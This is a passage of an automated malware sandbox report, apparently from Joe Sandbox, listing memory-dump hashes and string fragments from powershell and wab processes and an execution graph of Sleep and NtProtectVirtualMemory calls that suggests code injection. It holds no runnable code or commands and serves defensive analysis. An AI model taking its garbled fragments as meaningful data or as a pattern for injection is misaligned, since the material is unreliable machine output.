                                                                    • Instruction Fuzzy Hash: C9D14CB4A402188FDB64DF24CE45BDABBB2BB85304F1085EAD5096B355CB31AEC5CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$84~l$XRpq$XRpq$XRpq$tPkq$tPkq$$kq
                                                                    • API String ID: 0-298295786
                                                                    • Opcode ID: eb047dd01571d39501c89c0597a1f5a067123644920fe2085b4a636c5f540f1b
                                                                    • Instruction ID: d35a6fb1ba6cc7c761f57c0df6ce8cb839b5e6671439b9c71debecc1be40f93b
                                                                    • Opcode Fuzzy Hash: eb047dd01571d39501c89c0597a1f5a067123644920fe2085b4a636c5f540f1b
                                                                    • Instruction Fuzzy Hash: E361E7B5B0020ADFCB64DB688501AABBBF2AF89310F24C86EE5519F355CB35DC45C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-3065338361
                                                                    • Opcode ID: 0ec3ee138758102b48d4f078cba8e637c343e4f00ac657f59058b11ef50da8e3
                                                                    • Instruction ID: f188d700d08cf3b554067ab4e86657760bfe27b1971e78d05ff4d1a3c29906e4
                                                                    • Opcode Fuzzy Hash: 0ec3ee138758102b48d4f078cba8e637c343e4f00ac657f59058b11ef50da8e3
                                                                    • Instruction Fuzzy Hash: 5CE181B4B402099FD724DB58CA55BAFBBA2AF84314F14882ED5056F794CF31EC46CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$$kq$$kq$$kq$$kq
                                                                    • API String ID: 0-3289266258
                                                                    • Opcode ID: c05c94e1f23afb54247456c037a47b41aafa7c09831510e6e660b5017bdeeda4
                                                                    • Instruction ID: deda7c959427af6d4e32871a6f5e7086ba419a52173585129f951dabef1ccedc
                                                                    • Opcode Fuzzy Hash: c05c94e1f23afb54247456c037a47b41aafa7c09831510e6e660b5017bdeeda4
                                                                    • Instruction Fuzzy Hash: 016109B97042099FCB64CE69D8006FB77A9AFC2251F18C47FE4058B351DB36D986C791
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-3250639330
                                                                    • Opcode ID: 0e7a536d8d0cbd7e295d5049cace8054dc7b0f58fee090ddd67e538106069cb3
                                                                    • Instruction ID: faa463e8ac4e0606250d6f16532b45d66740a48a91d39c53474df452a6676c69
                                                                    • Opcode Fuzzy Hash: 0e7a536d8d0cbd7e295d5049cace8054dc7b0f58fee090ddd67e538106069cb3
                                                                    • Instruction Fuzzy Hash: B1A15EB4A402199FDB64DF14CD81BEAB7B2BB85304F1084EAD5096F395CB31AE85CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$84~l$tPkq$tPkq$$kq
                                                                    • API String ID: 0-2436752950
                                                                    • Opcode ID: 21b17eb5b6af1bc416d58363193cfeb287ba1c667011b848f34040cab35d001a
                                                                    • Instruction ID: f35151c3a47a8fa612c72d15de6b55cae2a9d48719867cd0f101483d6bf84486
                                                                    • Opcode Fuzzy Hash: 21b17eb5b6af1bc416d58363193cfeb287ba1c667011b848f34040cab35d001a
                                                                    • Instruction Fuzzy Hash: 3661377570010AEFC764DF69C540AABBBE6AB85310F24C46EE4419F395CB32EC46C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4}l$4}l$tLrk
                                                                    • API String ID: 0-505417328
                                                                    • Opcode ID: fbd565684714659d82a0b87923428acfc76cc889c7a2f423e30fafb288e4d304
                                                                    • Instruction ID: bb304c4fcbe80968b807c6a4b8a2e017988e1f2f436a6430310abc07ec077de8
                                                                    • Opcode Fuzzy Hash: fbd565684714659d82a0b87923428acfc76cc889c7a2f423e30fafb288e4d304
                                                                    • Instruction Fuzzy Hash: 2A61AFB4F402059FDB64DB58C944AAABBE2AFC4314F15847ED505AF754CB32EC418F91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$$kq$$kq$$kq
                                                                    • API String ID: 0-1023320533
                                                                    • Opcode ID: 8879409db7dbbfffba099d4ac5a127d1726a93d7f80d168aac3e7f95500cc6fe
                                                                    • Instruction ID: 19a1c51b8cbc3e2697008e64830a0db672b03268aa03c5641911af065311925c
                                                                    • Opcode Fuzzy Hash: 8879409db7dbbfffba099d4ac5a127d1726a93d7f80d168aac3e7f95500cc6fe
                                                                    • Instruction Fuzzy Hash: E83154BA300246AFCBA9CE6988506FBB7E2AFD1310B28446FD512873C5DA36E442C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$tPkq$$kq$$kq$$kq
                                                                    • API String ID: 0-296384169
                                                                    • Opcode ID: 286a90460ec49525715fa0d55101f2f57cba25c22e85544f8f2f0e6a3ffe3536
                                                                    • Instruction ID: deb6c9a7a1beec8c4bf24d4d71e61284d7cc4b9e13ddcdb6a4cd0ff315270dda
                                                                    • Opcode Fuzzy Hash: 286a90460ec49525715fa0d55101f2f57cba25c22e85544f8f2f0e6a3ffe3536
                                                                    • Instruction Fuzzy Hash: C34102F9A0420ADFDB65CE54C5407E6BBB2AF46210F1884EFD4059B393C736D982CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $kq$$kq$$kq$vl$vl
                                                                    • API String ID: 0-2208728031
                                                                    • Opcode ID: b935d0ab81258fb325bd791d992b00c9365bd8efd4c2e85a6603b6d9034c3351
                                                                    • Instruction ID: 2babf384395f2ce38881069451870e934d4d5d67c3469ff8ac2975452e94b735
                                                                    • Opcode Fuzzy Hash: b935d0ab81258fb325bd791d992b00c9365bd8efd4c2e85a6603b6d9034c3351
                                                                    • Instruction Fuzzy Hash: 1811D379310216DBDBB4D96A9C007A7F7ABABC1760F24842FA449863A1ED37D881C390
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-1162644626
                                                                    • Opcode ID: 526d56bd9e18f31fa775030b364d248d2bf2ece422f2d9796163e81a84dc3e83
                                                                    • Instruction ID: 6f9c4a3df9702680612e4e080503de7a5fdf0d3d7725a550186e162db9e96809
                                                                    • Opcode Fuzzy Hash: 526d56bd9e18f31fa775030b364d248d2bf2ece422f2d9796163e81a84dc3e83
                                                                    • Instruction Fuzzy Hash: 8BC15DB8F00205DFDB64DF54CA55BABBBB2AF84314F14882ED9056B794CB31A846CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$84~l$tPkq$tPkq
                                                                    • API String ID: 0-86603028
                                                                    • Opcode ID: 429444e3f8affd49a09dfb580b48d29d01023f35993e75eb729b591714662d5b
                                                                    • Instruction ID: 549b42488630bf88c288f21e451bb4cb569e16380f00706af11e6aaeed731d21
                                                                    • Opcode Fuzzy Hash: 429444e3f8affd49a09dfb580b48d29d01023f35993e75eb729b591714662d5b
                                                                    • Instruction Fuzzy Hash: 0351C6B9A00225DFDB64CE09C540AFBB7E2BB89310F1C845EE8156B395D732DD82CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$84~l$tPkq$tPkq
                                                                    • API String ID: 0-86603028
                                                                    • Opcode ID: 3c989565db68f48be84d34ba3c119ef183c8975c68c1b3fe1922a6da40768cdb
                                                                    • Instruction ID: 1a66a8749c3c82861b39a340a581dfc0f0d55160932cb290d96fdd774145ffb4
                                                                    • Opcode Fuzzy Hash: 3c989565db68f48be84d34ba3c119ef183c8975c68c1b3fe1922a6da40768cdb
                                                                    • Instruction Fuzzy Hash: 4B4148B5704355AFC761DE69D800AABBFA6AF85710F24C45FE8449F391CA35DC41C3A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $kq$$kq$$kq$$kq
                                                                    • API String ID: 0-2881790790
                                                                    • Opcode ID: 4d40b7e06307eceafd2cf3f5eed3dcaee9aefeada2bbe01732836b30005add9d
                                                                    • Instruction ID: 2044e0d3c6d8aebcb1ee803f5fc88ac5d368756cf6f2e887298c971ada390bc7
                                                                    • Opcode Fuzzy Hash: 4d40b7e06307eceafd2cf3f5eed3dcaee9aefeada2bbe01732836b30005add9d
                                                                    • Instruction Fuzzy Hash: C83135F5350206ABDA7499398D0177B669BABC5750F24882FE901CF3E1DEEAD84183A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $kq$$kq$$kq$$kq
                                                                    • API String ID: 0-2881790790
                                                                    • Opcode ID: f76ce8e7eb3eb9db6d358d05f08b745a7dc959a09c662cc9348098a7a3d7af50
                                                                    • Instruction ID: 16a92b480afe36e4a98c3d545561fec872b61565e526a480eaad906a1a869c6c
                                                                    • Opcode Fuzzy Hash: f76ce8e7eb3eb9db6d358d05f08b745a7dc959a09c662cc9348098a7a3d7af50
                                                                    • Instruction Fuzzy Hash: 5B214CB9310306DBDBB8992D9C0076777EB9BC0710F24882FE515CB3A5DE79E8418361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$$kq$$kq
                                                                    • API String ID: 0-1727931526
                                                                    • Opcode ID: feee49e579e77fde69e2a68ad6f7c2bcdc3aa077b11ab52e83c76cc565b3b26c
                                                                    • Instruction ID: d4eed539e4d15c1fcc41ae82b732a96d182414678be56d0b57404d172c8977aa
                                                                    • Opcode Fuzzy Hash: feee49e579e77fde69e2a68ad6f7c2bcdc3aa077b11ab52e83c76cc565b3b26c
                                                                    • Instruction Fuzzy Hash: FF01706570E2CA4FC73A453818211F76FE29FC211073548AFC0418F7C7CD198D468392
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:49.2%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:100%
                                                                    Total number of Nodes:4
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 12 47f3031 14 47f306e 12->14 13 47f309c Sleep 13->12 14->12 14->13 15 47f30e0 NtProtectVirtualMemory 14->15 15->14

                                                                    Callgraph

                                                                    • Executed
                                                                    • Not Executed
                                                                    • Opacity -> Relevance
                                                                    • Disassembly available
                                                                    callgraph 0 Function_047F29C2 1 Function_047F3031 1->0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000005), ref: 047F309E
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 047F3100
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.2952975039.00000000042B2000.00000040.00000400.00020000.00000000.sdmp, Offset: 042B2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_42b2000_wab.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProtectSleepVirtual
                                                                    • String ID: 7~W@
                                                                    • API String ID: 3235210055-2448543837
                                                                    • Opcode ID: 5dbe5311f4b2b84bc7203c2c33a0c62cdba30e54da5049295fa8a69d04213395
                                                                    • Instruction ID: f0bda2b4b3e34c292fceeaebc59f5df0dce217c922c55f4e0a057dd785684e18
                                                                    • Opcode Fuzzy Hash: 5dbe5311f4b2b84bc7203c2c33a0c62cdba30e54da5049295fa8a69d04213395
                                                                    • Instruction Fuzzy Hash: B21138B06007028FE7046E35DCDC7897765BF21398F454588EE968B3A2E774D884CF11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%